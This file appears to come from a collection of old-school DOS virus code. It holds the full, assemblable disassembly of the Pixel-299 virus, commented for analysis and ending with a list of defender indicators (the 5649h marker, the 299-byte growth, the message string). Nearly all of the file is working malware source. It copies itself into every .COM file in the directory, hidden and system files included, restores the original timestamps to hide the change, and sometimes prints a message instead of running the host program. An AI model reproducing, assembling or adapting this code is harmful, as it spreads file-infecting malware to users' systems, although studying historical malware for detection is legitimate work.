
📄 299.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;*****************************************************************************
;
; Pixel - 299 virus
;
; Disassembled By Admiral Bailey [YAM '92]
;
; Notes: I don't know where the hell I got this one from but when I found it on
;        one of my disks it was named incorrectly.  Some Amst shit but I looked
;        it up in the vsum and it's named as Pixel so I'll use that name.
;        Anyways it's just a plain COM-infecting virus that displays a message
;        when executed. Nothing big.
;
;*****************************************************************************

; Absolute offsets named by the disassembler.  The comments below describe how
; the visible code uses each one.
data_1e         equ     6Ch                     ; read with DS=40h: 0040:006Ch, BIOS timer tick count (low word)
data_2e         equ     96h                     ; CS:96h = default DTA (PSP:80h) + 16h, file time of the found file
data_3e         equ     98h                     ; CS:98h = default DTA + 18h, file date of the found file
data_4e         equ     9Eh                     ; DS:9Eh = default DTA + 1Eh, ASCIIZ name of the found file
data_15e        equ     12Bh                    ; read buffer in the work segment; 12Bh = 299 = virus length
data_16e        equ     12Dh                    ; read buffer + 2: word tested against the 5649h marker

seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a


                org     100h

;-----------------------------------------------------------------------------
; Pixel-299, DOS .COM image (entry at 100h), analysis notes.
;
; What the code below does:
;   1. Copies its own 12Bh (299) bytes to offset 0 of the segment CS+1000h.
;   2. Enumerates *.COM in the current directory (find first / find next).
;   3. For each file: reads it in behind the copy, skips it if the word at
;      file offset 2 is already 5649h, otherwise rewrites the file from
;      offset 0 as copy + original contents and puts back the time/date
;      taken from the DTA.
;   4. When the counter in data_7 is 5 or more and bit 0 of the BIOS tick
;      count is set, prints the data_13 text and terminates without running
;      the host; otherwise moves the host back to 100h and jumps to it.
;
; Indicators a defender can check, all visible in this listing:
;   - word 5649h at file offset 2, right after a 2-byte short jmp
;   - file growth of exactly 299 bytes with an unchanged timestamp
;   - the literal string starting 'Program sick error:Call doctor'
;-----------------------------------------------------------------------------
Pixel           proc    far

start:
                jmp     short begin             ; 2-byte jump over the data header
                dw      5649h                   ; marker at offset 2; same value tested at data_16e
data_7          db      0                       ; counter: incremented on every run, before the self-copy
data_8          db      2Ah, 2Eh, 43h, 4Fh, 4Dh, 0      ; '*.COM',0 search pattern
data_10         dw      0, 8918h                ; far pointer slot (offset, segment); both words rewritten in loc_5
data_12         dw      0                       ; byte count for the write = bytes read + 12Bh

begin:                                          ; loc_1:
                push    ax                      ; keep entry AX; popped into BX in loc_5
                mov     ax,cs
                add     ax,1000h                ; work segment 1000h paragraphs (64 KB) above CS
                mov     es,ax
                inc     data_7                  ; bumped before the copy, so the copy carries the new count
                mov     si,100h                 ; source: start of this image
                xor     di,di                   ; destination: ES:0000
                mov     cx,12Bh                 ; 299 bytes
                rep     movsb                   ; ES:0000..012Ah = copy of this code
                mov     dx,offset data_8        ; DS:DX -> '*.COM'
                mov     cx,6                    ; attribute mask 02h+04h: hidden and system files too
                mov     ah,4Eh                  ; DOS find first; result goes to the DTA
                int     21h                     ;

                jc      quit                    ; no match: go to payload check / host hand-over
get_file:                                       ; loc_2
                mov     dx,data_4e              ; DS:009Eh -> file name in the DTA
                mov     ax,3D02h                ; DOS open, access mode 2 (read/write)
                int     21h

                mov     bx,ax                   ; AX is taken as the handle; CF is not tested here
                push    es
                pop     ds                      ; DS = work segment
                mov     dx,data_15e             ; read buffer at DS:012Bh, right after the copy
                mov     cx,0FFFFh               ; ask for up to 0FFFFh bytes
                mov     ah,3Fh                  ; DOS read; AX = bytes actually read
                int     21h

                add     ax,12Bh                 ; bytes read + 299
                mov     cs:data_12,ax           ; saved as the length to write back
                cmp     word ptr ds:data_16e,5649h ; word at file offset 2 == marker?
                je      not_this_file           ; yes: file already carries the marker, skip it
                xor     cx,cx                   ; CX:DX = 0
                mov     dx,cx
                mov     ax,4200h                ; DOS seek, origin = start of file
                int     21h

                jc      not_this_file           ; seek failed: skip this file
                xor     dx,dx                   ; write from DS:0000 (copy, then the bytes just read)
                mov     cx,cs:data_12
                mov     ah,40h                  ; DOS write: file becomes copy + original contents
                int     21h

                mov     cx,cs:data_2e           ; CX = file time from the DTA
                mov     dx,cs:data_3e           ; DX = file date from the DTA
                mov     ax,5701h                ; DOS set file date/time: original stamp is put back
                int     21h

not_this_file:                                  ; loc_3:
                mov     ah,3Eh                  ; DOS close, handle in BX
                int     21h

                push    cs
                pop     ds                      ; DS back to this segment (DTA and data_7 live here)
                mov     ah,4Fh                  ; DOS find next
                int     21h

                jc      quit                    ; no more matches
                jmp     short get_file          ; process the next match
quit:                                           ; loc_4
                cmp     data_7,5
                jb      loc_5                   ; counter below 5: no message, run the host
                mov     ax,40h
                mov     ds,ax                   ; DS = 0040h, BIOS data area
                mov     ax,ds:data_1e           ; AX = word at 0040:006Ch (timer ticks)
                push    cs
                pop     ds
                and     ax,1                    ; keep bit 0 of the tick count
                jz      loc_5                   ; bit clear: no message, run the host
                mov     dx,offset data_13       ; DS:DX -> '$'-terminated text
                mov     ah,9                    ; DOS print string
                int     21h

                int     20h                     ; terminate; the host is not run on this path

data_13         db      'Program sick error:Call doctor o'  ; message text, usable
                db      'r buy PIXEL for cure description'  ; as a detection string
                db      0Ah, 0Dh, '$'                       ; LF, CR, terminator
loc_5:
                mov     si,offset data_14       ; source: 22h-byte stub below
                mov     cx,22h
                xor     di,di                   ; destination: ES:0000 (over the start of the copy)
                rep     movsb
                pop     bx                      ; BX = AX saved at entry
                mov     cs:data_10,0            ; far pointer offset = 0000h
                mov     word ptr cs:data_10+2,es ; far pointer segment = work segment
                jmp     dword ptr cs:data_10    ; continue in the stub at ES:0000

; The first 22h bytes of data_14 are code, run from the work segment after the
; jump above.  Hand-decoded (confirm with a disassembler):
;       1E                      push    ds
;       07                      pop     es
;       BE 2B 02                mov     si,022Bh        ; 100h + 12Bh, where the host starts
;       BF 00 01                mov     di,0100h
;       B9 FF FF                mov     cx,0FFFFh
;       2B CE                   sub     cx,si
;       F3 A4                   rep     movsb           ; move the host down to 100h
;       2E C7 06 00 01 00 01    mov     word ptr cs:[0100h],0100h
;       2E 8C 1E 02 01          mov     cs:[0102h],ds
;       8B C3                   mov     ax,bx           ; entry AX back in place
;       2E FF 2E 00 01          jmp     dword ptr cs:[0100h]
; 36 bytes are listed but only 22h (34) are copied; the last two (CD 20,
; int 20h) fall outside the stub.  Presumably they are the placeholder host
; of this sample; confirm against the binary.
data_14         db      1Eh
                db       07h,0BEh, 2Bh, 02h,0BFh, 00h
                db       01h,0B9h,0FFh,0FFh, 2Bh,0CEh
                db      0F3h,0A4h, 2Eh,0C7h, 06h, 00h
                db       01h, 00h, 01h, 2Eh, 8Ch, 1Eh
                db       02h, 01h, 8Bh,0C3h, 2Eh,0FFh
                db       2Eh, 00h, 01h,0CDh             ; 0CDh starts the trailing int 20h
                db      20h

Pixel           endp

seg_a           ends

                end     start


─────────═════════>>> Article From Evolution #1 - YAM '92

Article Title: Thrasher Trojan Disassembly
Author: Natas Kaupas


